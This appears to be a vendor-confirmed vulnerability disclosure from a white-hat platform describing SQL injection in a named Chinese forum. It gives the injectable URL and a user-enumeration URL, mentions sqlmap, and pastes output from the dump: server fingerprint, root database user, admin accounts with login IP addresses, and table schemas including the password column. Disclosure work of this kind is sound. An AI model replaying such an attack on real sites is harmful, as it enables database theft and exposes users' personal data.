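2015-08-20: Details reported to the vendor; awaiting vendor handling
2015-08-21: Vendor has confirmed; details disclosed to the vendor only
2015-08-31: Details disclosed to core white hats and experts in related fields
2015-09-10: Details disclosed to regular white hats
2015-09-20: Details disclosed to trainee white hats
2015-10-05: Details disclosed to the public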
This is my fourth submission, and still no front page??
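1. Injection point: http://bbs.jzq001.com/forum.php?mod=viewthread&tid=46569
2. Estimating the number of users: I registered this morning and 42985 is my id; user ids can be enumerated: http://bbs.jzq001.com/space-uid-42985.html
3. Fed it to sqlmap, which pulled out the data
4.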
[16:09:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
[16:09:53] [INFO] fetching current user
[16:09:53] [INFO] resumed: root@localhost
current user: 'root@localhost'
5.
| groupid | groups | slog | uid | username |
+---------+----------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----+----------+
| 3 | <blank> | <blank> | 0 | ???? |
| 3 | <blank> | 1361190053,183.129.201.251;1361200318,183.129.201.251;1361234648,183.129.201.251;1361237875,183.129.201.251;1361241914,183.129.201.251;1361245544,183.129.201.251;1361346056,183.129.201.251;1361349593,183.129.201.251 | 1 | admin |
| 4 | ,16,3, | <blank> | 2 | ?? |
| 4 | ,5,16,3, | 1361190078,220.189.80.247;1361246411,220.189.80.247;1361251211,220.189.80.247;1361254452,220.189.80.247;1361257064,220.189.80.247;1361265227,220.189.80.247;1361282541,220.189.80.247;1361363303,115.229.149.220 | 3 | ??? |
+---------+----------+------------------------------------------------------------------------------------------------------------------------------------------
6.
[37 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| aliww      | varchar(30)          |
| attach     | varchar(50)          |
| banpm      | text                 |
| bday       | date                 |
| datefm     | varchar(15)          |
| email      | varchar(60)          |
| gender     | tinyint(1)           |
| groupid    | tinyint(3)           |
| groups     | varchar(255)         |
| hack       | varchar(255)         |
| honor      | varchar(100)         |
| icon       | varchar(255)         |
| icq        | varchar(12)          |
| introduce  | text                 |
| lastaddrst | varchar(255)         |
| location   | varchar(36)          |
| medals     | varchar(255)         |
| memberid   | tinyint(3)           |
| msggroups  | varchar(255)         |
| msn        | varchar(35)          |
| newpm      | smallint(6) unsigned |
| oicq       | varchar(12)          |
| p_num      | tinyint(3) unsigned  |
| password   | varchar(40)          |
| regdate    | int(10) unsigned     |
| safecv     | varchar(10)          |
| shortcut   | varchar(255)         |
| signature  | text                 |
| site       | varchar(75)          |
| style      | varchar(12)          |
| t_num      | tinyint(3) unsigned  |
| timedf     | varchar(5)           |
| uid        | int(10) unsigned     |
| username   | varchar(15)          |
| userstatus | int(10) unsigned     |
| yahoo      | varchar(35)          |
| yz         | int(10)              |
+------------+----------------------+
7. Passwords of the 8 administrator users
Table: pw_members [8 entries]
8. Here are the users' most recent last-login times, and some study coins (学币)
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| address      | varchar(255)          |
| begintime    | int(10) unsigned      |
| cid          | int(10) unsigned      |
| content      | text                  |
| createtime   | int(10) unsigned      |
| deadline     | int(10) unsigned      |
| endtime      | int(10) unsigned      |
| hits         | int(10) unsigned      |
| id           | mediumint(8) unsigned |
| introduction | varchar(255)          |
| limitnum     | tinyint(3)            |
| members      | int(10) unsigned      |
| objecter     | tinyint(3)            |
| poster       | varchar(60)           |
| price        | decimal(8,2)          |
| title        | varchar(120)          |
| type         | tinyint(3) unsigned   |
| uid          | int(10) unsigned      |
+--------------+-----------------------+
9. The forum has about 500 tables; work through the rest yourself
[493 tables]
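That's it for now.
Plus the admin passwords from step 8.
Requesting front page, requesting a high score.
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-08-21 16:23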
thanks
None yet